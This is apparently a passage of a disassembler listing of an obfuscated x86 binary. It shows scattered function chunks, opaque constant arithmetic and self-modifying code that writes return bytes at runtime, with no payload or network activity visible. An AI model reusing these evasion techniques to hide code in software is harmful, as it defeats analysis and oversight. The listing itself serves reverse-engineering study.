; FUNCTION CHUNK AT 00458E78 SIZE 00000026 BYTES
; FUNCTION CHUNK AT 0045945B SIZE 0000000B BYTES

		test	eax, eax
		jz	loc_447CE9
		jmp	loc_45945B
sub_447610	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451669

loc_44761D:				; CODE XREF: sub_451669+3D29j
		pop	ecx
		rol	ecx, 0Ah
		and	ecx, 0C2F48D19h
		or	ecx, 6702D9ECh
		jmp	loc_4502DC
; END OF FUNCTION CHUNK	FOR sub_451669
; ---------------------------------------------------------------------------

loc_447632:				; CODE XREF: hvvrg7ie:004522E3j
		test	edx, edi
		jmp	loc_4505E6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450434

loc_447639:				; CODE XREF: sub_450434:loc_44A6EBj
					; hvvrg7ie:loc_452F92j
		or	esi, 29A33321h
		xor	esi, 0FD44B55Dh
		sub	esi, 55D394AAh
		test	esi, 4000000h
		jmp	loc_43D034
; END OF FUNCTION CHUNK	FOR sub_450434
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452E74

loc_447656:				; CODE XREF: sub_452E74:loc_4540C7j
		mov	esp, ebp
		push	offset sub_44AB90
		jmp	nullsub_267
; END OF FUNCTION CHUNK	FOR sub_452E74

; =============== S U B	R O U T	I N E =======================================



sub_447662	proc near		; DATA XREF: hvvrg7ie:loc_44D311o

; FUNCTION CHUNK AT 0043EC34 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004408EE SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045AB00 SIZE 00000017 BYTES

		mov	eax, [ebp-4]
		jmp	loc_43EC34
sub_447662	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444BE1

loc_44766A:				; CODE XREF: sub_444BE1:loc_44B75Bj
		cmp	byte ptr [ebp-5], 0
		jnz	loc_44A3DE
		jmp	loc_45968E
; END OF FUNCTION CHUNK	FOR sub_444BE1
; ---------------------------------------------------------------------------

loc_447679:				; DATA XREF: sub_4425F0+7616o
		mov	eax, [ebp-4]

loc_44767C:				; CODE XREF: hvvrg7ie:loc_455580j
		mov	al, [eax]
		js	loc_4418AE
		sub	al, 99h
		mov	edx, [ebp-4]
		jmp	loc_43CACD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BFF5

loc_44768E:				; CODE XREF: sub_44BFF5:loc_447C23j
		cmp	dword ptr [eax], 4742444Fh
		jz	loc_43BCB4
		jmp	loc_444EC8
; END OF FUNCTION CHUNK	FOR sub_44BFF5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445F2A

loc_44769F:				; CODE XREF: sub_445F2A-853j
		mov	ebx, eax
		jmp	loc_44D502
; END OF FUNCTION CHUNK	FOR sub_445F2A
; ---------------------------------------------------------------------------

loc_4476A6:				; DATA XREF: sub_45202B-9A64o
		mov	edx, 17B3C1CFh
		push	eax
		push	offset sub_44007A
		jmp	loc_456E41
; ---------------------------------------------------------------------------
		xchg	ebp, edx
		popf
		jmp	sub_447FEB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449007

loc_4476BE:				; CODE XREF: sub_449007:loc_456252j
		call	nullsub_22
		mov	eax, ds:dword_44EE2C
		push	edi
		push	0AB1A8DD8h
		pop	edi
		rol	edi, 0Ch
		add	edi, 4E61EE6Bh
		and	edi, 2AED520Ch
		jmp	loc_43B942
; END OF FUNCTION CHUNK	FOR sub_449007
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BEBB

loc_4476E3:				; CODE XREF: sub_44BEBB:loc_44B7E5j
		jnz	loc_447442
		jmp	loc_448AF7
; END OF FUNCTION CHUNK	FOR sub_44BEBB
; ---------------------------------------------------------------------------
		push	ecx
		push	0B57F740Dh
		xchg	edi, [esp]
		mov	ecx, edi
		pop	edi
		and	ecx, 87D0B2C5h
		push	edx
		jmp	loc_445D59
; ---------------------------------------------------------------------------

loc_447706:				; CODE XREF: hvvrg7ie:00443DD8j
		pushf
		ror	ecx, 7
		xor	edi, ebx
; START	OF FUNCTION CHUNK FOR sub_449885

loc_44770C:				; CODE XREF: sub_449885:loc_443DCAj
		rol	ebx, 11h
		and	ebx, 0B8297197h
		add	ebx, 0E020BFEEh
		mov	[ebx], eax
		jmp	loc_45188E
; END OF FUNCTION CHUNK	FOR sub_449885
; ---------------------------------------------------------------------------

loc_447722:				; CODE XREF: hvvrg7ie:0045A213j
		cmp	edx, 222A6EC5h
		jmp	loc_44CD4D

; =============== S U B	R O U T	I N E =======================================



sub_44772D	proc near		; CODE XREF: hvvrg7ie:0044AA4Bj
					; DATA XREF: sub_43EB47+BEEFo

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043A44D SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0043C60F SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00457202 SIZE 00000007 BYTES

		push	ebp
		mov	ebp, ebx
		xchg	ebp, [esp+4+var_4]
		push	9526A43Ch
		pop	ebx
		or	ebx, 9B81F445h
		jmp	loc_43A44D
sub_44772D	endp


; =============== S U B	R O U T	I N E =======================================



sub_447744	proc near		; DATA XREF: sub_44989C+C526o

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043B347 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0043D183 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004420D8 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00457ABF SIZE 00000005 BYTES

		xchg	ebp, [esp+0]
		push	ecx
		push	8DA58A05h
		pop	ecx
		xor	ecx, 87208A0h
		jmp	loc_457ABF
sub_447744	endp

; ---------------------------------------------------------------------------

loc_447759:				; CODE XREF: hvvrg7ie:004561C3j
		jnp	loc_453FF4
		and	ebx, 3821137h
		xchg	ebx, [edi]
		not	ecx
		jmp	loc_440376
; ---------------------------------------------------------------------------

loc_44776E:				; DATA XREF: hvvrg7ie:0044C846o
		pop	ecx
		lea	eax, sub_449425
		mov	byte ptr [eax],	0C3h
		jmp	loc_4529E5

; =============== S U B	R O U T	I N E =======================================



sub_44777D	proc near		; CODE XREF: sub_40CEB4+4p
					; sub_44777D+5j
					; DATA XREF: ...
		call	sub_43D809
		jmp	ds:off_41D11C
sub_44777D	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45493B

loc_447788:				; CODE XREF: sub_45493B-9B3Aj
		jmp	nullsub_196
; END OF FUNCTION CHUNK	FOR sub_45493B
; ---------------------------------------------------------------------------

loc_44778D:				; CODE XREF: hvvrg7ie:00445052j
		jo	loc_445E65

; =============== S U B	R O U T	I N E =======================================



sub_447793	proc near		; CODE XREF: sub_4465E5:loc_43A2B6j
					; hvvrg7ie:loc_440A0Fp

; FUNCTION CHUNK AT 0043F18C SIZE 0000001A BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	0B8312641h
		pop	esi
		add	esi, 6257ECD1h
		jmp	loc_43F18C
sub_447793	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C2EA

loc_4477A8:				; CODE XREF: sub_44C2EA:loc_4478F9j
					; sub_44D2F8-3B92j
		xchg	ebx, [esp+4+var_4]
		mov	esp, ebp
		xchg	edi, [esp+4+var_4]
		push	edi
		pop	ebp
		jmp	loc_45B09C
; END OF FUNCTION CHUNK	FOR sub_44C2EA
; ---------------------------------------------------------------------------
		jmp	ds:dword_41D178
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CD0B

loc_4477BD:				; CODE XREF: sub_43CD0B+660Cj
		jmp	nullsub_498
; END OF FUNCTION CHUNK	FOR sub_43CD0B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_8. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
		test	ah, cl
		add	[ecx], al
		add	[edi-2C74DBE4h], al
		pop	ebx
		mov	eax, [esp]
		push	esi
		mov	esi, edx
		jmp	loc_44C17F
; ---------------------------------------------------------------------------

loc_4477D9:				; DATA XREF: sub_44BCAE-D2F3o
		ror	eax, 1Dh
		add	eax, 0B2698032h
; START	OF FUNCTION CHUNK FOR sub_448DE4

loc_4477E2:				; CODE XREF: sub_448DE4+Cj
		mov	edx, [esp-8+arg_4]
		push	ebp
		mov	ebp, eax
		xchg	ebp, [esp+0]
		call	sub_45B2AC

loc_4477F0:				; CODE XREF: hvvrg7ie:00458F2Ej
		jmp	loc_43ADAD
; END OF FUNCTION CHUNK	FOR sub_448DE4
; ---------------------------------------------------------------------------

loc_4477F5:				; CODE XREF: hvvrg7ie:0043C964j
		jmp	loc_449AB6
; ---------------------------------------------------------------------------

loc_4477FA:				; CODE XREF: hvvrg7ie:00454F1Aj
		jb	loc_43F998

; =============== S U B	R O U T	I N E =======================================



sub_447800	proc near		; CODE XREF: hvvrg7ie:00442F61p

arg_0		= dword	ptr  4

		xchg	edi, [esp+0]
		pop	edi
		mov	eax, [esp-4+arg_0]
		push	edx
		call	sub_458D36
		mov	eax, 0CE14EFFFh
		call	sub_44B2D5
sub_447800	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_451B45

loc_447817:				; CODE XREF: sub_451B45-EA98j
		jmp	loc_459DC2
; END OF FUNCTION CHUNK	FOR sub_451B45
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B1C6

loc_44781C:				; CODE XREF: sub_44B1C6+C235j
		js	loc_43F4DE
		push	edx
		not	ecx
		jmp	loc_43B43F
; END OF FUNCTION CHUNK	FOR sub_44B1C6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451BC8

loc_44782A:				; CODE XREF: sub_451BC8:loc_45A119j
		add	ecx, 6079D8CFh
		xchg	ecx, [esp+0]
		jmp	loc_43918B
; END OF FUNCTION CHUNK	FOR sub_451BC8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443452

loc_447838:				; CODE XREF: sub_443452+E9F7j
		ror	edi, 17h
		cmp	esi, ebp
		jmp	loc_45AA22
; END OF FUNCTION CHUNK	FOR sub_443452

; =============== S U B	R O U T	I N E =======================================



sub_447842	proc near		; CODE XREF: hvvrg7ie:00443DDEj
					; hvvrg7ie:004568EEp
		xchg	ebx, [esp+0]
sub_447842	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_445F2A

loc_447845:				; CODE XREF: sub_445F2A:loc_446CC5j
		pop	ebx
		mov	al, [eax]
		jns	loc_4468D6
		push	offset loc_452E54
		jmp	nullsub_241
; END OF FUNCTION CHUNK	FOR sub_445F2A
; ---------------------------------------------------------------------------
		mov	eax, 0F2B89A19h
		push	ebx
		push	0C541F65Eh
		xchg	ecx, [esp]
		mov	ebx, ecx
		pop	ecx
		jmp	loc_458DAD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4465A6

loc_44786E:				; CODE XREF: sub_4465A6+11580j
		cmp	edi, ebp
		jmp	loc_439A99
; END OF FUNCTION CHUNK	FOR sub_4465A6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B6A5

loc_447875:				; CODE XREF: sub_43B6A5+5538j
		xchg	edx, [esp+0]
		retn
; END OF FUNCTION CHUNK	FOR sub_43B6A5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44531A

loc_447879:				; CODE XREF: sub_44531A+262Aj
		jmp	nullsub_89
; END OF FUNCTION CHUNK	FOR sub_44531A
; ---------------------------------------------------------------------------

loc_44787E:				; CODE XREF: hvvrg7ie:00440D43j
		jmp	loc_43D150

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_447883	proc near		; CODE XREF: hvvrg7ie:00439A35j
					; sub_452F3F-2B24j
		push	ebp
		mov	ebp, esp
		push	ecx
		call	sub_455701

loc_44788C:				; CODE XREF: sub_45541B-964Cj
		jmp	nullsub_243
sub_447883	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CD49

loc_447891:				; CODE XREF: sub_43CD49+9747j
		jl	loc_457129
; END OF FUNCTION CHUNK	FOR sub_43CD49
; START	OF FUNCTION CHUNK FOR sub_448100

loc_447897:				; CODE XREF: sub_448100-ACFAj
		jmp	loc_4502F3
; END OF FUNCTION CHUNK	FOR sub_448100
; ---------------------------------------------------------------------------
		pushf
		or	ecx, esi
		jmp	loc_457127
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E72F

loc_4478A4:				; CODE XREF: sub_44E72F:loc_43E736j
		cmp	dword ptr [ebp-1Ch], 66h
		jnz	loc_4576CA
		mov	eax, 6
		call	sub_440631
; END OF FUNCTION CHUNK	FOR sub_44E72F
; START	OF FUNCTION CHUNK FOR sub_440B13

loc_4478B8:				; CODE XREF: sub_440B13+B2F7j
		sbb	ebp, ebx
		pushf
		add	edx, 0FA17639Fh
		jmp	loc_45998D
; END OF FUNCTION CHUNK	FOR sub_440B13
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44FC12

loc_4478C6:				; CODE XREF: sub_44FC12+13j
		push	offset loc_4402BE
		jmp	loc_4483EE
; END OF FUNCTION CHUNK	FOR sub_44FC12
; ---------------------------------------------------------------------------

loc_4478D0:				; CODE XREF: hvvrg7ie:loc_4493A0j
		jz	loc_43DB3E
		jmp	loc_45A504
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44398A

loc_4478DB:				; CODE XREF: sub_44398A:loc_44A0BAj
		popf
		add	ecx, eax
		pop	eax
		mov	ecx, 15456553h
		push	offset sub_43A625
		jmp	nullsub_189
; END OF FUNCTION CHUNK	FOR sub_44398A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C2EA

loc_4478EE:				; CODE XREF: sub_44C2EA:loc_44A539j
		mov	edx, edi
		pop	edi
		mov	eax, [esp+0]
		call	sub_443C1D

loc_4478F9:				; CODE XREF: sub_44B595+9j
		jmp	loc_4477A8
; END OF FUNCTION CHUNK	FOR sub_44C2EA

; =============== S U B	R O U T	I N E =======================================



sub_4478FE	proc near		; CODE XREF: sub_43953B+D0D1p
					; hvvrg7ie:00448004j

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043C9AB SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043FED5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448897 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044AD83 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 004501E2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A942 SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		mov	eax, [eax]
		push	ebx
		mov	ebx, edx
		xchg	ebx, [esp+0]
		jmp	loc_45A942
sub_4478FE	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C811

loc_44790F:				; CODE XREF: sub_43C811:loc_43A12Bj
		cmp	al, 0A4h
		jz	loc_4503D5
		jmp	loc_44C7FC
; END OF FUNCTION CHUNK	FOR sub_43C811
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_273. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

locret_44791D:				; CODE XREF: hvvrg7ie:loc_44E490j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452C40

loc_44791E:				; CODE XREF: sub_452C40-170B3j
		jmp	loc_43DE0A
; END OF FUNCTION CHUNK	FOR sub_452C40
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_352. PRESS KEYPAD	"+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_53. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A26A

loc_447925:				; CODE XREF: hvvrg7ie:0044ECD1j
					; sub_45A26A+Aj
		jmp	loc_4464D6
; END OF FUNCTION CHUNK	FOR sub_45A26A
; ---------------------------------------------------------------------------

loc_44792A:				; CODE XREF: hvvrg7ie:00445304j
		jmp	loc_44D1A1
; ---------------------------------------------------------------------------
		mov	ebp, 60A61E7h
		jz	loc_4422AB
		jmp	sub_43BA56
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44531A

loc_44793F:				; CODE XREF: sub_44531A:loc_44B695j
		push	offset loc_43D3F6
		jmp	loc_447879
; END OF FUNCTION CHUNK	FOR sub_44531A
; ---------------------------------------------------------------------------

loc_447949:				; CODE XREF: hvvrg7ie:004484D6j
		jns	loc_43C35B
		js	loc_446940
		add	ebp, 5F6068B1h
; START	OF FUNCTION CHUNK FOR sub_4591C3

loc_44795B:				; CODE XREF: sub_4591C3:loc_442C10j
		rol	edx, 6
		add	edx, 66DBDAFh
		add	edx, ebp
		push	edi
		push	79AA699h
		jmp	loc_44AFE6
; END OF FUNCTION CHUNK	FOR sub_4591C3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451110

loc_447971:				; CODE XREF: sub_451110:loc_45111Cj
		cdq
		test	ebx, 0F749CA03h
		jmp	loc_442FA2
; END OF FUNCTION CHUNK	FOR sub_451110
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449D38

loc_44797D:				; CODE XREF: sub_449D38:loc_455ECBj
		mov	ebp, edx
		add	eax, ecx
		jmp	loc_44200B
; END OF FUNCTION CHUNK	FOR sub_449D38
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F272

loc_447986:				; CODE XREF: sub_43F272j
		pop	edx
		mov	eax, [esp-4+arg_0]
		push	offset loc_459C2A
		jmp	loc_43D5D4
; END OF FUNCTION CHUNK	FOR sub_43F272
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45493B

loc_447994:				; CODE XREF: sub_45493B+4BF7j
		or	ebx, 0F462D05Bh
		mov	ebx, eax

loc_44799C:				; CODE XREF: sub_4465A6:loc_4597E1j
		mov	byte ptr [ebp-806h], 0
		mov	byte ptr [ebp-805h], 0
		push	offset loc_4394A5
		jmp	loc_455F7F
; END OF FUNCTION CHUNK	FOR sub_45493B
; ---------------------------------------------------------------------------

loc_4479B4:				; CODE XREF: hvvrg7ie:loc_4432C8j
					; hvvrg7ie:004487B1j
		add	edi, 278FE6D1h
		mov	[edi], eax
		pop	edi
		lea	eax, loc_4501E7
		mov	byte ptr [eax],	0C3h
		jmp	loc_4501E7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451669

loc_4479CB:				; CODE XREF: sub_445934+9DC6j
					; sub_451669-1481j
		call	sub_43AF96

loc_4479D0:				; CODE XREF: sub_451DFF-E499j
		jmp	loc_44E997
; END OF FUNCTION CHUNK	FOR sub_451669
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440195

loc_4479D5:				; CODE XREF: sub_440195+5972j
					; hvvrg7ie:00453371j
		jge	loc_450AC7
; END OF FUNCTION CHUNK	FOR sub_440195
; START	OF FUNCTION CHUNK FOR sub_45970D

loc_4479DB:				; CODE XREF: sub_45970D-7BF1j
		jmp	loc_451067
; END OF FUNCTION CHUNK	FOR sub_45970D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4562B0

loc_4479E0:				; CODE XREF: sub_4562B0-54BCj
		jmp	nullsub_234
; END OF FUNCTION CHUNK	FOR sub_4562B0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441AB2

loc_4479E5:				; CODE XREF: sub_441AB2+C668j
		jmp	sub_44C132
; END OF FUNCTION CHUNK	FOR sub_441AB2
; ---------------------------------------------------------------------------
		cdq
		jmp	loc_450ABF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B3BE

loc_4479F0:				; CODE XREF: sub_43B3BE:loc_44932Fj
		jnz	loc_44C4F0
		jmp	loc_452217
; END OF FUNCTION CHUNK	FOR sub_43B3BE
; ---------------------------------------------------------------------------
		cmp	ecx, 0EBEE1CCCh
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_447A01:				; CODE XREF: sub_43F227:loc_450984j
		jmp	loc_458BDD
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4414D3

loc_447A06:				; CODE XREF: sub_4414D3:loc_458DB2j
		jz	loc_457DDF
		jmp	loc_4394E7
; END OF FUNCTION CHUNK	FOR sub_4414D3
; ---------------------------------------------------------------------------

loc_447A11:				; CODE XREF: hvvrg7ie:loc_4573BEj
		jz	loc_44F916
; START	OF FUNCTION CHUNK FOR sub_43B3BE

loc_447A17:				; CODE XREF: hvvrg7ie:00445FA5j
					; sub_43B3BE+1669Cj
		jmp	loc_43FBFB
; END OF FUNCTION CHUNK	FOR sub_43B3BE
; ---------------------------------------------------------------------------

loc_447A1C:				; CODE XREF: hvvrg7ie:00441450j
		jmp	locret_446A87
; ---------------------------------------------------------------------------
		or	edi, esi
		jmp	loc_44F910
; ---------------------------------------------------------------------------

loc_447A28:				; CODE XREF: hvvrg7ie:loc_450B11j
		jnz	loc_451FFD

loc_447A2E:				; CODE XREF: hvvrg7ie:0043C892j
		jmp	loc_45769B
; ---------------------------------------------------------------------------
		mov	edi, ecx
		sbb	edi, ebx
		jmp	loc_451FFC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BCAE

loc_447A3C:				; CODE XREF: sub_44BCAE:loc_43F4AAj
		adc	ecx, ebp
		jnp	loc_43DC57

loc_447A44:				; CODE XREF: hvvrg7ie:00452803j
		xchg	esi, [ecx]
		jmp	loc_43DD12
; END OF FUNCTION CHUNK	FOR sub_44BCAE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451176

loc_447A4B:				; CODE XREF: sub_451176-4098j
		ror	ebx, 6
		add	esi, eax
		mov	edx, edi
		and	ecx, 9A1F6D65h
		jmp	loc_445A2A
; END OF FUNCTION CHUNK	FOR sub_451176
; ---------------------------------------------------------------------------

loc_447A5D:				; CODE XREF: hvvrg7ie:0043944Cj
		add	ebx, 0B1439F8Dh
		jmp	loc_458EB9
; ---------------------------------------------------------------------------

loc_447A68:				; DATA XREF: sub_454099-12786o
		mov	[edi], eax
		xchg	esi, [esp]
		push	offset sub_43D369
		jmp	locret_43C137
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4391F1

loc_447A77:				; CODE XREF: sub_4391F1+21B8Fj
		pop	ecx
; END OF FUNCTION CHUNK	FOR sub_4391F1
; START	OF FUNCTION CHUNK FOR sub_43A839

loc_447A78:				; CODE XREF: sub_43A839:loc_43A7F4j
		call	sub_4548C9
; END OF FUNCTION CHUNK	FOR sub_43A839
; START	OF FUNCTION CHUNK FOR sub_453BA4

loc_447A7D:				; CODE XREF: sub_453BA4-56D2j
		jmp	sub_44612F
; END OF FUNCTION CHUNK	FOR sub_453BA4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439529

loc_447A82:				; CODE XREF: sub_439529+104C3j
		jmp	loc_448812
; END OF FUNCTION CHUNK	FOR sub_439529
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439FEE

loc_447A87:				; CODE XREF: sub_439FEE:loc_440333j
					; hvvrg7ie:00440343j
		add	eax, 0BB6273F2h
		add	eax, ebp
		add	eax, 5BD91D9h
		push	eax
		push	59685BAh
		pop	eax
		jmp	loc_443C2C
; END OF FUNCTION CHUNK	FOR sub_439FEE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440643

loc_447AA1:				; CODE XREF: sub_440643:loc_4410A0j
		push	eax
		push	esi
		push	0F50157DCh
		pop	esi
		jmp	loc_44BAB0
; END OF FUNCTION CHUNK	FOR sub_440643
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_447AAE:				; CODE XREF: sub_43F227:loc_453249j
		or	edx, eax

loc_447AB0:				; CODE XREF: sub_450F97-8FC2j
		jmp	loc_449A82
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448100

loc_447AB5:				; CODE XREF: sub_448100:loc_457CFBj
		mov	[ebp-10h], eax
		cmp	dword ptr [ebp-4], 0
		jz	loc_441477
		jmp	loc_4554F9
; END OF FUNCTION CHUNK	FOR sub_448100
; ---------------------------------------------------------------------------

loc_447AC7:				; CODE XREF: hvvrg7ie:0043C46Bj
		jge	loc_4545B5

; =============== S U B	R O U T	I N E =======================================



sub_447ACD	proc near		; CODE XREF: hvvrg7ie:loc_447FA6p
		xchg	esi, [esp+0]
		pop	esi
		or	eax, eax
		jmp	loc_459032
sub_447ACD	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_447AD8:				; CODE XREF: hvvrg7ie:0043B099j
		jns	loc_43D716

; =============== S U B	R O U T	I N E =======================================



sub_447ADE	proc near		; CODE XREF: hvvrg7ie:0045805Ep
		xchg	edi, [esp+0]
		pop	edi
		push	8930B82Ah
		jmp	loc_4412CD
sub_447ADE	endp

; ---------------------------------------------------------------------------

loc_447AEC:				; CODE XREF: hvvrg7ie:00459572j
		pop	edi
		add	eax, 0EB68675Ch
		sub	eax, 8DF8C798h
		add	eax, 5EECC67Dh
		xchg	eax, [esp]
		jmp	sub_451703

; =============== S U B	R O U T	I N E =======================================



sub_447B07	proc near		; CODE XREF: sub_4498AE-DD6Dp
					; sub_45196D:loc_442DE9j ...
		push	offset loc_446AB2
		jmp	nullsub_63
sub_447B07	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45190C

loc_447B11:				; CODE XREF: sub_45190C:loc_458701j
		mov	eax, [esp+8+var_8]
		push	offset sub_456881
		jmp	nullsub_318
; END OF FUNCTION CHUNK	FOR sub_45190C
; ---------------------------------------------------------------------------
		shl	edx, 8
		jmp	loc_444F6B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449425

loc_447B26:				; CODE XREF: sub_449425:loc_44D70Ej
		mov	eax, 0D53D974Bh
		call	sub_450C5A
		mov	ds:off_41D064, eax
		lea	eax, loc_45828F
		mov	byte ptr [eax],	0C3h
		jmp	loc_45828F
; END OF FUNCTION CHUNK	FOR sub_449425
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CA70

loc_447B44:				; CODE XREF: sub_43CA70+1E437j
		push	offset sub_43A5A1
		jmp	nullsub_447
; END OF FUNCTION CHUNK	FOR sub_43CA70
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B031

loc_447B4E:				; CODE XREF: sub_445CB5+2j
					; hvvrg7ie:0044B34Dj ...
		xchg	eax, edx
		call	sub_446A16
		retn
; END OF FUNCTION CHUNK	FOR sub_44B031
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450246

loc_447B55:				; CODE XREF: sub_450246-1A4Bj
		jmp	loc_44DD6A
; END OF FUNCTION CHUNK	FOR sub_450246
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439B44

loc_447B5A:				; CODE XREF: sub_439B44+7j
					; DATA XREF: sub_4544DD-19670o
		jmp	loc_44D806
; END OF FUNCTION CHUNK	FOR sub_439B44
; ---------------------------------------------------------------------------
		db 0EDh
dword_447B60	dd 0			; DATA XREF: hvvrg7ie:loc_44DB68r
dword_447B64	dd 1351124Dh, 7123994Ch, 6363C8h, 4814820Fh, 0D7680000h
					; DATA XREF: sub_44914D:loc_44759Bo
					; sub_445CB5+4B02o
		dd 0E9E15FA0h, 41BBh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4538F3

loc_447B80:				; CODE XREF: sub_4538F3-915Fj
		xchg	ecx, [eax]
		pop	edi
		cdq
		mov	esi, [ebp+0]
		jmp	loc_4443A9
; END OF FUNCTION CHUNK	FOR sub_4538F3
; ---------------------------------------------------------------------------

loc_447B8C:				; CODE XREF: hvvrg7ie:0043E668j
		rol	ecx, 1Eh
		add	ecx, 0EB79BD8Ch
		mov	[ecx], eax
		pop	ecx
		lea	eax, nullsub_484
		mov	byte ptr [eax],	0C3h
		jmp	loc_4522D4

; =============== S U B	R O U T	I N E =======================================



sub_447BA6	proc near		; CODE XREF: sub_44048E+11411p
		xchg	esi, [esp+0]
		pop	esi
		ror	eax, 1Fh
		push	offset loc_452E7D
		jmp	nullsub_64
sub_447BA6	endp


; =============== S U B	R O U T	I N E =======================================



sub_447BB7	proc near		; DATA XREF: sub_447FEB-B295o

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043F416 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004489BE SIZE 00000003 BYTES
; FUNCTION CHUNK AT 00456C16 SIZE 00000005 BYTES

		push	0A6167D75h
		pop	edi
		or	edi, 0F87CB912h
		xor	edi, 62308D39h
		xor	eax, edi
		jmp	loc_456C16
sub_447BB7	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_533. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_447BD1	proc near		; CODE XREF: hvvrg7ie:0043DDA8p
					; hvvrg7ie:00450329j

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 00459B92 SIZE 00000019 BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	407D8660h
		pop	edx
		add	edx, 232EE2CDh
		xor	edx, 83F5AFC0h
		or	edx, 6D107A6Eh
		jmp	loc_459B92
